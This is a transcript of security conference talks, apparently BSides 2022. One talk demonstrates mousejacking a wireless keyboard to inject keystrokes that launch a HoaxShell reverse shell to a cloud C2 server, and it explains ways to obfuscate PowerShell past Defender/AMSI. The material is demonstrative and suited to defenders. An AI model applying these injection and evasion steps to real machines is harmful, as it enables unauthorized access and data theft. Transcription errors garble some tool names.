like hundreds depending if your security team is a very small team right you guys work in big company is a security team how many hundreds of people not a few hundreds definitely right not even thousand even engineering but I work for companies who are ten thousand their core engineering maybe 50 maybe 100 if you're lucky right everyone is outsourced right they get EPC engine procurement construction company that's where all the 700 800 1000 Engineers are working not in the owner operator right how do I know I go there and ask the engineers you know what protocol you think they don't know I said where do I get the information ask the EPC right that's why they know that that's where

it is right so these are the kind of thing you need to uh even for security right so nowadays they do have to take accountability now because of a lot of Regulation like we'll see 60 uh 23 is it 20 23 24 or 26 and for security one is for our privacy so now they have more and more uh one of every uh type of roles and discipline in the company because you cannot delegate you cannot Outsource accountability okay so that's what's happening right now so you have to keep track with what's going on and what's changing right now um in the industry so how do you find out this kind of stuff so you join your

professional association right any professional association they are they are in tune with all the really boring stuff like legislation bylaws rules right any other stuff is uh join the uh um another way you want to become an expert recognized officially expert by candidate go join us you can understand the Council of Canada uh Association or SEC standard Council of Canada SEC basically outward facing look at the standards that's outside and then CSA inside Canada how many of you have participated in CSA and SEC raise your hand anyone you guys did not do any you guys did not participate you know 27 000 anyone know what ISO 27 000 families yeah yeah well guess what I just screw you

guys up right because I was on the board I I voted for Canada nobody tell me what to do I just arbitrarily vote no I'm just kidding and there's about five to ten of us we decide that we speak on behalf of Canada right can you guys do that sure you can just go there go to the website and then just apply submit your resume in there or CV whatever they ask for once they look at they review it then they have to send you an official paper they say you're officially an expert then you can represent Canada right online okay represents Canada as expert you know you guys did not know for 10 years I've been

making decisions on behalf of Canada all the security stuff right on all your behalf oh I'm not on there anymore I got tired of it so uh because any standard takes about five years to change five to ten years so I I do give up I get I don't get sick of it so I'll just let you know yeah there's a lot of opportunity if you want to become expert someone going to become a famous globally go to those and then you can participate in any of iso activity you guys know what ISO stands for someone say standard Association when I join them you know what they told me International sightseeing organization so they have meeting everywhere around

the world and government pay for it and you go travel right yeah you guys are laughing yes it's true right you guys don't know how to enjoy life and like the the previous speaker talk about Chiefs talk about engineering yeah there was one case where they found someone uh doing control system and then he went to court right well we know what happened those two always budding head and just what happened on that year I was I yeah I was the uh expert for both for kids and for engineering so that was interesting right try to feel like affidavit had to go stand before George and explain why have what you know who's right who's

wrong uh those are interesting stuff if you really want to get involved to that level uh then you have to join them and they have to give you a piece of paper they have to test certify that you are an expert so you can go testify in front of the judge right so uh that's why we don't normally you don't see any title that say expert because it's legal right so everything that come out of your mouth someone follow and say it they can get you know and then uh someone die or places exploded someone has to go to jail right not right away okay because all these professional association doesn't have the right first of all they take away

your destination then they can try to punish you to give you a slap then you don't listen they pass it over to the law enforcement under the criminal act you go to jail you get fine okay so those are the kind of thing in reality that's what you do right to me I think security very seriously right to me it's not a game so that's why I try to tell my students too I tell them the reality of it everything you learn the hacking that you do uh normally has lots of holes we do it on purpose so you learn so you have to write a report a lot of people think security you don't have to

write you don't have to know how to write uh you don't have to know how to read you don't have to do research right follow rules follow policy right I have students who say what do you mean I have to put a title page what do you mean I have to uh provide references I think no plagiarism is stealing right academic Integrity is violating it's basically like you know breaking the rules right part of security is enforce that right that's what you guys do right when I say this when I told them you have to read they said what do you mean reading I said you know how many contracts I have to read any one of you

read contract as part of your job yeah right I mean it's not a fun thing but you have to do right before you do penetration testing you have to read the thing right read the rules policy before you do any work you have to read your contract what you can and cannot do so I told my student you know that's the reality of work um another thing too is that background right so I keep telling people it doesn't matter what your background is um like I say who's the most important person on a security team what kind of role what do you think the background is for security what occupation like what kind of domain

subject that you need on the security team what's the most important and you want to take a guess so it's mathematics right think about it information security what's the fundamental information security it's math right so you need a mathematician who can tell you exactly why Mass first of all they got the proof mechanism they have the formalization mechanism they know how to uh analyze uh equation and algorithm right I'm not a mathematician I cannot compete with them right I know people people will say that oh I know I know company would say yeah don't worry we'll just we just translate all the encryption we write our own code we use the library and all that but all of you will know

that if you were to um I implement it right those of you who know Hardware depending on your CPU depending on your how many digits depending on how your information all the bits and bytes or enables that's arranged in your computer the running errors all that you can cause potentially vulnerability in your system that's where mathematician will come in can help you out right so one of the best person I ever had was a mathematician on my team so they can analyze to see whether whatever we do they can do all the calculation probability and stuff like that right all these years I've been doing security engineering I never have to use engineering only one time I have to use

the engineering and that was because they told me Vincent you have five no you have 10 milliseconds that's all the time that's all the time I give you 10 milliseconds you put your security inside that time frame that's the only time I do engineering other than that I never have to do a Disney array everywhere I just throw a firewall normally that will solve the problem okay so um just let me show you about the time it's time now 10 20 okay yeah any other questions uh any question at all you want to ask I'll be more than happy to answer anything you want um and also and also um another thing I told my student I said

if yes Allah I'll come over with a mic and I think I tell my student to it if you want to really do um all out test use everything you know do join the law enforcement right they can do things that regular people cannot do right they can uh they can do Counter Intelligence they can do counter attack if you do military I remember when I do military work I I asked a very stupid questions okay I asked the radio engineer I said what frequency you wanted to build the stuff for is that what do you mean what frequency all of the Vincent so it's not like just 2.4 5.06 for iot it's the whole Spectrum so that's what I found

fun yes yeah well that's a little loud uh the question I had was you you talk a lot about professional associations and standards education Etc and I didn't hear anything about open source and kind of what would your recommendation be I guess maybe to your students um with respect to involvement in open source as a Proving Ground for skills uh learning Cutting Edge technology using open source or is your opinion that is pretty much constrained to classrooms uh security organizations standards bodies Etc just curious as to your view on open source there yeah so open source or open uh like mood or whatever open courses normally I ask a student first right for my own courses I will ask I don't want

just to give you tissue the course because it makes no sense if it's not the right course for you right I've I've students who are 50 60 years old I asked what's your objective when are you planning to retire right I said you want to spend twenty thousand dollars for a course you're only going to use for like three years and you're going to pay student loan after you retired right so I want to make sure it's the right course for you right guys I have a student account told me she took security then I said here that's a good job for you over here I say you want to do it say no Vincent I

just want to stay home I got two kids I want to stay in for the next 10 years I have to respect that right so I had to guide her towards what she need to achieve which is take care of her kids for the next 10 years right so I said would you like to do uh maybe Operation Center you know do some research that you can do from home okay so I cannot really tell you uh you know you should do this you should do that right My Philosophy is take the one that you want what you know info whatever you want to do and then go for the the gold standard that you want that's how I practice and

that's it and then you try to do I feel yeah I feel man I feel I feel quite a few times right I mean I feel my courses before right so my test that's part of life right then you learn feel fast then you recover so it's not open source they are open source that's good they open courses that's good a lot of places are good they teach you the good stuff so you have to decide which one is right for you you can talk to people and make sure that's the right for you as you know the the in thing right now I'll tell you the latest stuff is something called stackable credential you got sort of stackable credential

you guys know what that is it like CompTIA right when you take four doesn't when you take four exam you end up with eight destination right so you take exam one exam two exam three exam four you got four destination then because you took one and two you get another destination three and four is another one uh so you ended up six to eight destination very quickly those are called stackable credential right they used to have big one you get a certificate or diploma then they found people don't have the time now they go into micro credential now they have stackable credential right now you can actually behind your name you can put a b c d all the way up

to Z right you just have to have a really long business card that's all or flip it to the other side say PLO please look over uh that's the end thing right now in terms of school-wise right in the industry why there is still uh different company have different needs right uh some company doesn't believe in a professional destination now I don't personally I'm not favoring anything any destination I just respect the law of the land that we live in right if the Law changes and say that from now on anyone can call themselves Professional Security I respect the law okay yes I do have background in engineering I have background in I.T and security

but I I want to respect the Lord okay I just don't don't say that I'm favoring one over the other all right so um hopefully I'm not sure I answered you did put in a lot of variables there for me to answer um yeah and then school too right all depending on what you want to do right do you want to pay off or whatever I teach a lot I teach for many different University and colleges I see a lot of my students it's tough when you teach a more vocational level it's really tough when you have students they have to decide whether they pay for the next course or they pay for the uh for their food or

they pay for the rent right so just teaching itself for me is not the thing I have to actually help students right during pandemic I have five students trying to commit suicide right so it's not easy I have one was out in France right he told me I just emailed me say I've been said you know I really feel bad you know I think I'm gonna go kill myself what are you gonna do right it doesn't matter what you teach whether if it's a non-security or security courses so some of my student security courses actually feel the stress I don't know whether you like to hear this kind of stuff but I'm giving the reality of uh you know or what I'm I'm

facing right now in the world right so those are some of the um so and then another thing too that you can um decide to whether you want to work in the private or public sector right so a lot of this stuff too I asked you know what's your objective in life most of the time I don't ask about the job right those of you who take Capstone with me mentoring programming me I never asked her what kind of job because I want to know what's your objective in life and that will help decide on the courses right even if you're 40 years old you say Vincent I want to go take a course or take a program a degree or something

there's a lot of degree trust me okay uh or diploma or certificate they all cost money so then what's your what's your return what do you want to be do you want to be a tag forever or you want to have a career path to go up so I have a lot of students who are asking what's the best ways to stack my experience to stack what I need to do next so that I can achieve what I want to be I want to be head of security I want to become famous most people in the activity may I just want to become famous most people in the industry wants to make money that seems to be the the

general things right so you can you can leverage both too I tell the Professor I say the moment you publish your paper I'm going to take your idea I'm going to go make money right so you have to leverage all this stuff so that way you can um you know decide what you want uh in life and so another thing was uh investment right well you heard about people who just do investment if you guys are all security expert why don't you invest in technology I get phone calls all the time email they say hey Vincent this new up and coming uh this I mean coming uh company they have this brand new security technology so I invest in it

while it's still penny stock or you know so we invest in it right so if you guys are really good in your technology why don't you do that you don't have to work for anyone you can just do investment so there's a lot of different opportunity you can do not just go work for someone first I'll do a lot of presentation for technical school like name and say the first thing the HR tell me Vincent don't tell the students to go get a degree because you can get a diploma you can get a certificate right I tell you most people who graduate from University they are trained to become an employee right most people from technical school they

train to run a business and who do you think they're going to hire they're going to hire those people with the degrees right uh don't get me wrong I have both degree of certificate so I can talk about both so you all decide you guys all can decide what you guys want out of life right so think about carefully all I want to do is share with you some of the information so that you don't think so you know where to go look for that kind of job that you want right I've seen all kinds that's why I asked if you have any questions let me know uh you know or certain areas I didn't expect certain industry uh I can

tell you what is it like so the only places that I enjoy the military is nice the only thing I don't like is that uh you cannot talk about it and then you've got this thing called reliability that after you quit the company you cannot travel you cannot go to certain places do certain things I say I want to travel I don't care so I don't want that clearance so uh so I went to Industrial because you can talk about it more right you can show off a little bit more right uh and you can contribute too right so uh yeah so those are some of the stuff that you can decide I mean OT is a big space but it's getting to be

a little bit more crowded now right but I do want to advise that if you do learn a little bit more technical detail because we reach the point now saturate now where you need to know a little bit more in terms of um you know what do you do what what's actually is happening with that uh technical wise right I'm not saying go to Too Much level but go to the next level because right now every year I graduate you know say for the University I have anywhere from like 400 student graduate with data analytics expertise okay and some of them are push button anyone use power bi anyone use Tableau anyone use those kind

of stuff here do you guys actually know what happened when you push that button see what happening after you push the button that's where the money is right we reach the stage now where we need to know what happened when we push that button right you know how many companies I went through they say you have an industrial firewall they say yes I said what protocol are you filtering they say what do you mean filtering so that's really funny they filter the I.T club and they don't filter the OT side right so uh and then you go to different like keep in mind the world we have is not just not otit right so you go to a building building has

bacnet you have long works you have protocol that OT doesn't use right when you start to deal with satellite you have another four protocol you deal with Telecom you have another three or four more protocols registration to base station base station to head office to front end and then to the Excel those are protocols that you don't have a firewall for for right so that's why when I look at security I don't look at just various uh domain specific so I want you guys because we reached the point now we'll go beyond it now we go beyond OT right so I just want you guys to protect what you guys heard about Vegas how they

track they hack into the uh what was that Casino through hacking the aquarium right because somehow they want to connect the experience to the building management system I believe small firewall have long version back net now you can technically filter the uh uh check the uh the rules for your building uh protocol but there's still a lot of protocols out there for systems that you may never even heard of most of them doesn't even run on IP right like Fast ethernet H1 trophy bus those all doesn't really run on IP right so they run on a different version of ethernet they run on maybe uh 420 milliamps they run on things that you just don't you can still ride the file

you can still write rules the whole concept of having a firewall having rules you can still Implement that in everything in the scada in the PLC in the rtu in your IED in your PCS in your DCS you can Implement all those in those systems how many of you actually Implement that you can also Implement in your devices instrumentation if you have something like uh fieldbus Foundation field bus things like that right so those devices actually have redundancy they have memory their CPU right at the instrumentation site at the right on the instrument so you have five instruments sensor thermos ultrasonic there's actually computer system that backed up redundant each other even if you lose you can operating blind

right we learned about business continuity we learn about Disaster Recovery you have to include all those as part of the operating system I work in the water sectors I know security people said Vincent you have to secure this thing you have to secure that you have to put a firewall here you have to have parts of authentication here and there see that's when you have to talk to The Domain expert I thought to the technician I thought of the process people that said Vincent so what is someone hacking into that system you know we have four four hours window to fix the process right so if someone hacked into that unless they hack the whole thing in the worst

case we're done for three days okay because in Calgary is we don't use chemical we use bacteria right we are now bio nutrient removal technology so in the worst case we have to re-regrow the bacteria again so the fact you have a firewall that's down you just swap it out change it again refresh it we can refresh all our system in less than one hour that's our requirement in 45 minutes so four out four days uh four hours is a lot of time so I don't have to invest a lot in Security in the water sector unless I do linear assets outside the fence like aqueducts check gate pumping station then I had to put a bit

more because they are very far away so when I secure the water from Arizona right 300 miles then I have to do that because helicopter would think so we're trying to figure out how long does it take a helicopter to fly out there to Harbor zoo and things like that so we have to those those calculation those are you know return to time objective and others if the points so those are the kind of thing uh out the world out there it's not just you know security let's put a firewall everywhere right so think about understand the business do we really need it okay and a lot of time we think security is just I.T but there's a lot of things

that business can help uh to secure the business itself right understand the process all I guess is one hour right roughly one hour you can still run out round down to half a second it's not that bad the top one will be um utilities right in half a second a trip in Edmonton will hit the breaker in uh right there very quickly right Tanya okay so basically uh so let you guys care so what is my priority now in life what kind of job am I doing what do you think I'm doing now these days yes I'm over 50 so so uh so the job I'm doing right now is basically uh around my family

I teach at the University because my kids at University when my kids get internship downtown I get a job right across the street I know my kids don't like that but they like it because I get them free right right if they want food I'm right there for them I spent a lot of time with my kids right so I do security job whatever they want I'll do it as long as close to my code so that's my objective in life so you can decide whatever your objective and your security career so fill up decide now what you want to be as your security career all right thank you thank you Dr Chu [Applause] all right

um we could just roll into the next presentation so just get going here I know this one uh it's gonna be more technical I'm guessing that's a good guess

all right so we've got uh our next talk uh Scott Taylor uh Scott is a senior manager of cyber security for MMP digital uh one of our sponsors today um but not uh not a sponsored talk it's a personal talk uh he leads uh offensive industrial risk and audit engagements across Canada with over 15 years of experience in I.T and cyber security Scott holds is a cissp oscp The Shield the sword uh cisa PCI qsa certifications and has graduated from State and York University so with his talk entitled chaining hacking techniques together please welcome to the B-side stage Scott Taylor [Applause] thank you everyone welcome to Nate welcome to b-sides 2022 at least I think

it's 2022. I don't know if I got my time machine here but anyway my talk today is called chaining hacking techniques together and uh as it was introduced it is a fairly technical talk but I do think anyone can get uh something out of this so as my introduction I am Scott Taylor I'm a senior manager for uh mnp my Twitter handle is shoot for root and uh please find me on LinkedIn I always love networking with everyone in this industry so we're going to start with the obligatory don't do bad things I'm going to show you some in-depth hacking techniques today so um a lot of stuff that you're not supposed to do so don't do this if you

don't have permission to and certainly don't uh say Scott showed me how so a little hacking 101 like our friend Jugger not here we need an attack Vector to breach the perimeter so how do we do that if you follow the miter attack framework there's generally nine accepted ways of uh getting that initial access there's a few more if you include the ICS one so if we're briefly want to go buy um these uh so drive by compromise that's not driving your car by that's that's a website that you go by external remote Services if you opened up RDP to the world that's that's on you uh fishing that's always going to be the most uh common way to breach a perimeter

get in a network exploit the public facing applications that's your oau stuff your uh your OS top 10 web application things Hardware editions someone breaks into your business they stick in a Raspberry Pi that gives them a connection valid accounts someone maybe a malicious Insider has an account they get in that way removable media that's a USB stick it's got some malware in it that's no good supply chain you get a computer from China they've put a chip in that's that's uh malicious that's no good either trusted relationship that's your third party service providers they get popped you could get popped now the closest one to the one I'm going to show you comes in Wireless compromise now

it's not truly Wireless uh the the spirit of that one is more Wi-Fi uh what I'm going to show you Falls a little bit outside of that but the point and the Takeaway on this is the miter attack framework is a comprehensive framework it's not necessarily an exhaustive one there's a few other ways you can get in so we're enter mouse jacking this is my all-time most favorite uh vulnerability of all time it's now six years old and I still see it a lot today this was discovered by Mark Newlin and Bastille research in 2016. they debuted at Defcon 24. uh this affects all wireless keyboards and we're talking the 2.4 gigahertz variety not Bluetooth

all major vendors are affected Logitech Dell Microsoft literally all of them what it does is it sends intercepts and then sends unencrypted keystrokes into the keyboard it's going to be the same as if you're just typing right on the keyboard so unencrypted is bad uh you can inject keystrokes into these vulnerable keyboards up to 100 meters away so um just to put that in perspective that's about a football field there's a lot of stuff within a football field radius of here uh and as I pointed out it's very much still a problem today we see this on a lot of um engagements we do so have you patched your keyboards we're talking a little dongle that you put in

anybody do you guys patch your keyboards no of course you don't no one ever thinks to do that so we need to do this attack uh this is called a crazy radio PA dongle you get it for fifty dollars that's it little guy you plug in you can run some tools with it do your attack so demo visual one of what I'm going to show you that little box on the left is me shoot for root and I'm at my bus stop uh outside my house the little uh box on the right that's symbolic of either in this case my house or it could be your corporate Network it could be really anything uh now that little firewall there is

irrelevant because we're going to go right around it so the first step is we're going to probe and we're going to see if that keyboard is vulnerable it's going to come back and it says yes it is and then we're going to inject the keystrokes and in the first demo we're going to pop notepad and put a little message on the screen so tools and prep work the little tool we're going to use inside Cali is called jacket and this was written by a fellas named fiction and infini and what it does when you run it that's what we're doing to probe to see if the keyboard is vulnerable if it is it's going to come back it's going to give

you an address and it's going to allow you to inject those keystrokes uh to do that are there anybody familiar with duckyscript so if you have a rubber ducky it's the exact same language that's used for those so uh we're going to utilize the jacket tool and we're going to write a little ducky script for it now if you see here it says gooey art that's the same as if you hit Windows key R which is going to give you the little run dialog box right I put a little delay in there because you don't want everything to happen at once you want to sequentially pause things a little bit we're going to open the Run box and then we're going to do

stuff string notepad I'm going to open notepad another little delay and then put in the string fellow follow the White Rabbit Neo or at least follow shoot for root on Twitter

okay so if we follow along on the demo here you're going to see a couple screens let me just pause here the screen on the left is my attacking laptop the screen on the right I am blind to that is my desktop inside my house the bottom here is footage from my ring camera outside of my house you can pardon my uh my shoveling job there's a little icy so we start the scan from the jacket tool I have my vulnerable keyboard plugged in inside the house as I'm walking to the bus stop now this scan can take anywhere from about 30 seconds to about five minutes uh I've found no real Rhyme or Reason

why sometimes it takes longer than another wait a few seconds there it is it's detected the vulnerable keyboard and then I'm going to inject that ducky script attack and right as I do that pops notepad follow the right rabbit Neo or at least follow shoot for root on Twitter so it's very important to understand I am not connected to Wi-Fi in any way shape or form so I am outside the house but I'm within that 100 meters so this is going to work if you're outside someone's house if you're in an apartment complex if you're outside the White House if you are in a corporate building you're going to pick up every single vulnerable keyboard top to bottom

now the one caveat I should point out is the when they pop up here there's no identifying markers other than the type so I can't actually tell uh that this is your keyboard of your business when we do this on pen tests I usually won't take it past the scan stage because I can't guarantee these are yours they could be the building or the office below it could be the office above I can say within some certainty it's probably yours but I can't guarantee it okay so let's take this one step further what are we going to do next we're going to start thinking about how we can chain other attacks together with it so for you on the offense of uh of side

of cyber or it's a Basics reverse shell that's what we want to do next these are connections that initiate on the Target and come connect back to the hacker on a listening part okay and the reason we do that is because firewalls are going to allow a lot more outbound traffic than they are inbound if you come outbound on Port 80 or 443 it's going to look just like web traffic if there's any kind of egress filtering you'll usually get by that weaponization so if you think about the uh the kill chain one of the stages is weaponization and what this means is you're going to be creating some malicious payload and you're going to be

tweaking it to fit your purpose so in this case I've showed you something really old from about six years ago I'm going to show you something really new this is called hope shell and this has just came out a few months ago if any of you have been following this so this was created by a fellow named and I apologize I can't pronounce either of his handle or his real name but telemachus I think and panagoitis chartis is his real name anyway brilliant tool he wrote here uh this is really fancy it's a heavily obfuscated payload and it both creates The Listener and the payload all in one little platform now when he first put this out this

initially bypassed Windows Defender and most EDR products okay which is pretty impressive and that's the GitHub repo right there for it so let's talk a little bit about the obfuscation Cat and Mouse game and I'll start by telling a little story so when this this uh hope shell came out fully undetected by almost all EDR products um that doesn't usually last long usually uh the products catch wind to it and they figure it out and then they'll update their definitions and then you're gonna get you're gonna get blocked from there so when that first came out it bypassed everything and then uh if you guys know John Hammond he put out a YouTube video and he showed off hope

shell and within days of that Microsoft updated their definitions now this is great if you're on if you're defending your network this is not so great if you're trying to make a talk and and write about it and then now they've blocked it so we have to put a little bit further obfuscation in here so if you're trying to run a malicious payload and the anti-malware scanning engine and power shell you might get an error message like that and that is what you will get here Dikembe Matumbo does not like it so when I was playing around with this I actually decided to message the creator of the tool on Twitter and he's a nice guy and he decided to

work with me on the obfuscation techniques to get this by so I said it was caught he said yeah well all you have to do is just replace the invoke web request with iwr now for those of you understand Powershell this is really interesting because invoke web request and iwr do the exact same thing it's just a shorthand version from it so if anyone can explain to me why that bypasses stuff that's that's uh interesting to me um so I will run this demo on the obfuscation here um step one we run hoax shell this is the base64 encoded payload we want to actually see what's inside of here so we can just type raw payload

this is the raw payload now you can see some of the variables and stuff those are randomly generated that he's done in um in this payload so he's already done layers of obfuscation on here to bypass these products a lot of these strings and stuff are turned into variables and shuffled around and all kinds of stuff so if we pop this into Powershell and get blocked it can be Matumbo doesn't like it so as you can see we have all the real-time protection all the stuff all the AMC engine it's going to pick it up it's going to block it so we just need to tweak it a little bit maybe we can get a bite

now a few things you can do let's start with removing the invoke web requests so we're just going to put iwrs now when I first did this and he told me to do that it worked it worked beautifully so it probably was a few weeks later that that didn't end up working so again that cat and mouse game back and forth back and forth

place the iwrs we pop it and okay so we know we need to do a little bit more a few other little tricks you can do you can put stuff like plus symbols in with little little uh single quotations there you can litter the whole thing with that and then often that will end up fooling a lot of the EDR and Antivirus stuff you can even put stuff like single quotes multiple times throughout other functions and it's still going to work the same and that sometimes fills it as well so let's try that no good so one more trick we did and I was talking to uh the creator of the tool and he discovered that all we had to do

in this particular one is check that invoke expression variable and I put two single quotes in between the I the E and the X that's it let's take that fire through oh look what we got here shell came through it's an interactive shell we can now run commands on the computer okay so now we've done the weaponization stage we want to chain that together so I'm going to walk you through the finale here so we still have me at the bus stop over here we got my house right there the only other component we're going to need here is I need a little bit of C2 infrastructure and the reason for that is again I'm not on Wi-Fi I can't just

dial a connection back to myself it's got to go somewhere so we're going to send this out to an AWS server and I'm going to tether my iPhone at the bus stop and connect to that so I'm going to force the traffic here and then connect to it now a real life attacker are you going to use AWS probably not you got to give your credit card that's that's no good you're probably going to spin up um a uh Anonymous VPS pay with crypto something like that but that's a little overkill for this demo so again the walkthrough we're gonna probe we're gonna see if the keyboard is vulnerable it's going to come back it's going to

say yes we're going to inject the keystrokes with our new reverse shell payload we're going to force Powershell to talk home and pull the hook shell payload it's going to come back and now we've infected the computer essentially and we're going to force that command shell connection back to us okay this is just a little bit of prep work this is my AWS instance that I I spun up you're going to have to do a few little firewall tweaks on there remember you got to connect to this through SSH and you got to set up the ports so the listener can catch the shell if you remember our ducky script here before we were plopping notepad now

we're going to pop Powershell instead and that string is that big long raw payload that we discovered in Hope shell okay now just to make this extra fun in reality this is the computer inside my house but this will work if you're sitting outside the White House as well or anywhere that has this vulnerability so we have user Joe Biden here and we have super secret government files sitting on the desktop and the nuclear codes are one two three four let's see if we can grab those foreign

at the bus stop but I didn't put the ring footage on here so first stop let's first step let's check I'm Tethered to my iPhone I am not connected to any Wi-Fi I'm going to SSH into my Cali uh box in AWS

I am going to generate a new hook shell foreign

notice the IP ever address of that that's up in the cloud we're going to have a look at our raw payload because we're going to have to obfuscate it a little bit

we know all we need to do is really tweak that invoke expression

now keep in mind at the top I got two tabs open remember one tab is up in AWS in the cloud the other tab is local to my laptop that I'm running the attack from so we go in here we're going to have to edit our string that we just created with our new payload

we are going to run jacket

we're going to detect the vulnerable keyboard we're going to send the attack and watch carefully now we pop Powershell and that big long string from hoax shell gets inputted in there now could you do that quietly so it doesn't show up maybe but for the purpose of this demo that's what's going to show up on the screen and when that fits what do we got we got user Joe Biden we have popped the shell let's have a look at the desktop and what do we have super secret government files let's have a look

and the nuclear on scotes one two three four now again remember we're not connected to Wi-Fi we are sitting at the bus stop within 100 meters of the house there's no network connection of any kind other than tethering through the through the iPhone up until the AWS infrastructure so all we've done is forced the computer inside to talk to the cloud and that gave us an interactive connection with it also remember you got one shot at this if you have one typo or anything it's not going to work so you're blind you can't see anything so keep that in mind so I'll just let's talk about risk for a little bit and put this in a real life scenario so

we got our little uh impact probability Matrix so what are the odds of somebody actually having the skills to do this and having the equipment and actually targeting you to do it I'd say probably pretty rare so it's low now the impact though I mean if you did something like this it could be very extreme so that gets us kind of that that Medium risk something to think about so final takeaway is I mean you're gonna have to think about all devices on your network there's all kinds of stuff just because it doesn't have an IP address doesn't mean it's something you shouldn't think about um people who have very good patch Management Programs you have an asset

inventory what all do you put in the asset inventory usually things with IP addresses so if you're patching all of that that doesn't mean there's other devices laying around that that aren't now you might think well okay whatever just go patch all the keyboards well it's not all that that simple if you have an organization and you got 2 000 keyboards laying around uh well you're gonna go one by one and just do them all or even if you replace them all there's a cost associated with that so it's not something organizations or people really think about it just it kind of uh just flies under the radar but anyway I thought I'd take Something Old Something

New and Powershell is blue I guess so uh thanks guys for my talk um I guess we'll we'll see if there's any questions thanks Scott uh Round of Applause please do we have any uh questions feel free to put up your hand or stand up um I guess while people are thinking about it for the Enterprises you know how how would we protect against this would we want to monitor Powershell better on our endpoints Let's uh yeah so a lot of organizations as the mature will have detection capabilities and monitoring of things like Powershell it's not even recommended to necessarily block Powershell and even if you block Powershell you could probably open a command prompt and do something similar

so uh you're going to want to do that monitoring the problem with that is if you have any kind of monitoring by the time you you look at the logs or anything it's probably too late you already have the nuclear launch codes so fortunately I mean if we take this keyboard vulnerability it is gradually phasing out all new keyboards are not affected by this it's only anything that's about five years old or uh or older so as time progresses this one is gradually going to go away but as we said a lot of physical uh engagements I go to I run this scan and we pick them up left and right so something to think

about any questions oh yeah we've got one right here hey um thank you for the talk it was awesome so I noticed that when we did the IEX call and then you tried to exfiltrate it and not exfiltrate but type it out right because it's a text file but what if it's a XML based file let's say Doc xlsx or something do we need to create another shell or can we do uh can we directly exfiltrate it out from this one so you're saying when we when I put that into like wordpad or no uh let's say if I want to exfiltrate some other type of files like Zip word or like once you're actually connected or when you are

actually connected yeah how do exfiltrate the other type of files rather than just type because it won't work well if you had a real-life attacker is probably going to use something a little more comprehensive than even just the something like the hoax shell so a real life hacker will probably use a comprehensive C2 framework like Cobalt strike so they'll get a beacon inside of there and then now you got the secure channels back and forth so that's much stronger if you got uh thousands of dollars laying around and you want to get cobalt strike that's perfect there's some open source ones too that are very powerful as well so that's typically what a real life attacker would do

because it creates those extra channels that makes exfiltrating stuff much easier you can pivot around and create other beacons throughout the network that are going to channel through that so that's probably what they would do

all right so another round of applause thank you Scott [Applause] we've got a little bit of time so feel free to take a break and we'll reconvene in 50 all right looks like we're good to go apologies for the delay um I'd like to introduce our next speaker George nazare uh he assured me that uh the pronunciation was okay uh George is a graduate from Youngstown State University with a Bachelor of Science in Computing science and has been specializing in computer security for the past 20 years some of the companies he has worked for include albanza hosting iron Port systems Cisco and FireEye during his time at FireEye he worked for the Department of Defense

specializing in the U.S Army and the U.S Air Force in 2019 he transitioned to the Western Canadian team to be with his family in Calgary and in 2022 this year George became a crowd Striker and is a regional sail engineer for crowdstrike covering western Canada this role includes but is not limited to endpoint security Cloud security identity protection and threat intelligence with his talk entitled building a complete picture how to gain full visibility of an attacker please welcome to the B-side stage George nazri [Applause]

okay okay can you guys hear me now either a Sprint or Verizon commercial depending on how old you are uh so today we're going to be going over building a complete picture of uh using the kill chain and what an attacker looks like okay is this better okay so we're all familiar with the kill chain at least if we're in security okay and as we know we you know go down or reconnaissance weaponization all the way down to actions of objective um my goal today is to explain you know what type of Hardware you can use I'm not going to be bringing up any vendors we have them in the back room you know we got penalized so we have to go into

the back room over there but you know we'll be more than happy to talk about the actual vendors but you know what do you need in your environment to actually see this and then what to protect it you know both from a software slash Hardware point of view and then actual Personnel because there's a lot of things that you know insecurity the worst thing is the user we need the users but at the same time they also cause all the problems uh in the environment so first we're going to go reconnaissance and personally I think this is the hardest one to actually detect and the reason I make that statement is they can be hitting you up

on your LinkedIn page your Facebook page any type of social media you have and you have actually absolutely no idea that they're doing it you know none of us have you know access logs to Facebook you know probably a couple other people do but it'd be kind of nice to see how many people are actually hitting it you know but what type of tools can you do you know we've heard about the dark web monitoring you know you have a bunch of companies out there that are searching the dark web which I love that term because everybody thinks that there's two internets there's this really dark evil one that's in all the movies and then there's the one that grandma's

going on you know looking at you know pretty pictures and stuff I know but you gotta take a look at that see what's actually out there about either yourself or your company you know what did somebody you know they could have hacked another company and actually got some information from you because you're part of that supply chain and they go to a little nice you know pen testing what can pen testing help other than you know all the holes you have in your network but it's also very helpful to see you know where are those holes and by seeing those holes you're able to block them and it also stops them from doing recon because if you

have open you know let's pick DNS if you actually have what version of bind you're running it's very simple to figure out okay what type of vulnerabilities are out there to go after it and then moving farther down you know perimeter monitoring and also physical security you know it's real easy you know we saw here today you know I can walk in the front door no problem I can see what's going around here you know possibly I can look at some pictures on the wall that oh you're using Exchange or there's a new portal that's out there here's how I get the account and stuff like that so other than you know we're all tied to it we all think it's package

running around and stuff like that but you also got to think about the physical and a lot of people do forget about that and then also when you get to the people now social media everybody loves being on social media they want as many views as possible but then that also says hey we're finding out because you put where do you work what activities do you do these are great things for people to create fishing uh attacks and other types of information email awareness no we've all received some type of email that hey I've won a million dollars click here so I can deposit it or I got the latest uh tickets to the latest game

and then also social engineering now I'll date myself here okay one of the best social engineerings I read about was Kevin mitnick you know of all the fun stuff that he did especially in his court trials uh with Sprint and stuff like that um he's now working for a nice three-letter company uh doing consulting work for for how good he was on the social media side and some of the things he's doing now I do not put him as a top hacker anymore he has moved down a little bit

so the next one I have is weaponization this is actually the fun part from the hacker side you know what am I gonna what type of weapon am I going to use to go to battle you know you don't take a you know a knife to a gunfight unless you wish to be one of the people that died in that fight you know so I'm not gonna be trying to exploit something on Google when they're a full Microsoft Microsoft shop is completely worthless so I got to make sure I weaponize it correctly again this is where dark web monitoring comes in you can see some of the new tools that are out there what the new packages

are I will give the hacking groups that they are very useful for franchising um but then some of the other things of vulnerability management you know we all love Patch Tuesday but you know actually knowing what vulnerabilities you have on your network you know you don't want to advertise them because that gives adversaries a very simple way of saying hey I can download this GitHub code you know put a couple little bit of payloads here and away I go and then also printer perimeter monitoring you know how do I do I have physical access to some boxes that might also make me decide what weapon I wish to choose you know do I want to you know

possibly put a drone up you know do I want to do Wi-Fi scanning uh of the of the area

so delivery this is kind of you know if you've talked to any IR responders or anything like that this is probably the best stories you hear on how did they actually deliver it um if you go all the way back you know and this is neither confirmed nor denied and how is the Iranian nuclear power plant taken down and they say they threw USB drives in the driveway good possibility you know I've still been wanting for a conference like this is just throw a bunch of USB drives out outside and see how many people actually pick them up but I haven't gotten the budget yet for the USB drives you know but you know you

